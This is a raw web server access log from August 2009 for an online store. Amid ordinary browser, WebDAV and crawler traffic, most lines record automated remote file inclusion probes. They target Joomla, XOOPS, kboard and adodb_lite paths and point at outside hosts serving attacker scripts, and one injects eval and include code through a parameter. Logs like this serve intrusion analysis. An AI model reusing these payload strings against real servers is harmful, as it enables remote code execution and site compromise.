74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:11 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; Google Desktop)"
74.194.164.142 - - [05/Aug/2009:07:57:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195F1454405A600E663066+M37+ENG HTTP/1.1" 200 38027 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:20 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195F14F47950600EDB3066+M37+ENG HTTP/1.1" 200 38027 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195F1454405A600E663066+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:40 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195F14F47950600EDB3066+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:41 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.194.164.142 - - [05/Aug/2009:07:57:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
217.67.239.230 - - [05/Aug/2009:07:58:03 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
217.153.226.14 - - [05/Aug/2009:07:58:09 -0400] "GET /logs/error_log.Q109051700/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://droneh.altervista.org//r0x-id.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:07:58:09 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
172.16.1.88 - - [05/Aug/2009:07:58:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:07:58:16 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:07:58:16 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:07:58:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:07:58:16 -0400] "PROPFIND /QIbm HTTP/1.1" 405 230 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.108.88.84 - - [05/Aug/2009:07:58:39 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:07:58:45 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
172.16.1.80 - - [05/Aug/2009:07:58:51 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:58:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:07:58:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.15.48.60 - - [05/Aug/2009:07:58:54 -0400] "GET /logs//modules/xoopsgallery//init.php?GALLERY_BASEDIR=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:07:58:55 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery//init.php?GALLERY_BASEDIR=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:07:58:56 -0400] "GET //modules/xoopsgallery//init.php?GALLERY_BASEDIR=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:07:59:16 -0400] "GET /logs/access_log.Q109051200//modules/xoopsgallery//init.php?GALLERY_BASEDIR=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
89.108.88.84 - - [05/Aug/2009:07:59:32 -0400] "GET /logs/access_log.Q109051600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:07:59:32 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:07:59:33 -0400] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
172.16.1.180 - - [05/Aug/2009:07:59:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:59:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:59:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.108.88.84 - - [05/Aug/2009:08:00:01 -0400] "GET /logs/access_log.Q109070500/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:00:16 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:00:17 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:00:17 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:00:39 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
172.16.1.80 - - [05/Aug/2009:08:00:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:08:00:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:08:00:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:00:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:00:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:00:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
201.38.0.130 - - [05/Aug/2009:08:01:02 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 200 454 "-" "libwww-perl/5.805"
213.171.225.234 - - [05/Aug/2009:08:01:08 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.171.225.234 - - [05/Aug/2009:08:01:08 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id?? HTTP/1.1" 200 12406 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
89.108.88.84 - - [05/Aug/2009:08:01:10 -0400] "GET /logs/access_log.Q109071900/index.php?redir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:01:11 -0400] "GET /index.php?redir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:01:11 -0400] "GET /logs/index.php?redir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
91.121.83.177 - - [05/Aug/2009:08:01:26 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:08:01:36 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.108.88.84 - - [05/Aug/2009:08:01:56 -0400] "GET /logs/error_log.Q109071900/index.php?redir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.67.239.230 - - [05/Aug/2009:08:02:15 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
89.108.88.84 - - [05/Aug/2009:08:02:19 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:02:19 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:02:20 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:02:22 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
209.59.12.99 - - [05/Aug/2009:08:02:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.67.239.230 - - [05/Aug/2009:08:02:34 -0400] "GET /logs/access_log.Q109051600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:02:35 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:02:35 -0400] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:02:45 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
89.108.88.84 - - [05/Aug/2009:08:03:00 -0400] "GET /logs/access_log.Q109071400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
93.187.200.218 - - [05/Aug/2009:08:03:04 -0400] "GET /logs/access_log.Q109072100%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:08:03:04 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:08:03:04 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.153.226.14 - - [05/Aug/2009:08:03:05 -0400] "GET /logs/access_log.Q109061400%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://droneh.altervista.org//r0x-id.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.813"
93.187.200.218 - - [05/Aug/2009:08:03:10 -0400] "GET /logs/error_log.Q109072100%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
172.16.1.168 - - [05/Aug/2009:08:03:18 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:03:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:03:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.108.88.84 - - [05/Aug/2009:08:03:28 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
74.53.201.178 - - [05/Aug/2009:08:03:42 -0400] "GET /logs/access_log.Q109052400%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:03:42 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:03:42 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.108.88.84 - - [05/Aug/2009:08:03:45 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
217.67.239.230 - - [05/Aug/2009:08:04:07 -0400] "GET /logs/access_log.Q109070500/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
74.53.201.178 - - [05/Aug/2009:08:04:10 -0400] "GET /logs/access_log.Q109060500%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:08:04:24 -0400] "GET /logs/access_log.Q109072100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
93.187.200.218 - - [05/Aug/2009:08:04:28 -0400] "GET /logs/error_log.Q109072100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
172.16.1.69 - - [05/Aug/2009:08:05:00 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:05:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:05:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [05/Aug/2009:08:04:45 -0400] "GET /logs/access_log.Q109070900 HTTP/1.0" 200 4950912 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [05/Aug/2009:08:05:46 -0400] "GET /logs/access_log.Q109072500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.113.196.16 - - [05/Aug/2009:08:05:54 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:05:54 -0400] "GET /logs/access_log.Q109070300%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:05:54 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:05:54 -0400] "GET /logs/access_log.Q109052900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.30.81.182 - - [05/Aug/2009:08:06:05 -0400] "GET /logs/error_log.Q109071600 HTTP/1.0" 200 2578785 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.113.196.16 - - [05/Aug/2009:08:06:28 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:06:28 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:06:28 -0400] "GET /logs/access_log.Q109070300%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:06:28 -0400] "GET /logs/access_log.Q109052900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.67.239.230 - - [05/Aug/2009:08:06:43 -0400] "GET /index.php?redir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.813"
72.30.81.182 - - [05/Aug/2009:08:06:07 -0400] "GET /logs/error_log.Q109071600 HTTP/1.0" 200 2578785 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.108.88.84 - - [05/Aug/2009:08:06:55 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
172.16.1.69 - - [05/Aug/2009:08:07:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:07:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:07:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [05/Aug/2009:08:06:49 -0400] "GET /logs/access_log.Q109070400 HTTP/1.0" 200 1764892 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [05/Aug/2009:08:07:18 -0400] "GET /logs/access_log.Q109070700 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [05/Aug/2009:08:07:27 -0400] "GET /logs/access_log.Q109050900 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [05/Aug/2009:08:06:09 -0400] "GET /logs/access_log.Q109051100 HTTP/1.0" 200 5205411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.153.226.14 - - [05/Aug/2009:08:07:52 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://droneh.altervista.org//r0x-id.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.813"
202.177.22.67 - - [05/Aug/2009:08:08:07 -0400] "GET /logs//shop/main.php?_shop_path=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
202.177.22.67 - - [05/Aug/2009:08:08:07 -0400] "GET //shop/main.php?_shop_path=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
172.16.1.82 - - [05/Aug/2009:08:08:18 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:08:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:08:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [05/Aug/2009:08:07:54 -0400] "GET /logs/access_log.Q109070500 HTTP/1.0" 200 2033988 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.108.88.84 - - [05/Aug/2009:08:08:54 -0400] "GET /index.php?redir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.67.239.230 - - [05/Aug/2009:08:08:56 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:08:56 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:08:56 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:08:57 -0400] "GET /logs/error_log.Q109052100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.813"
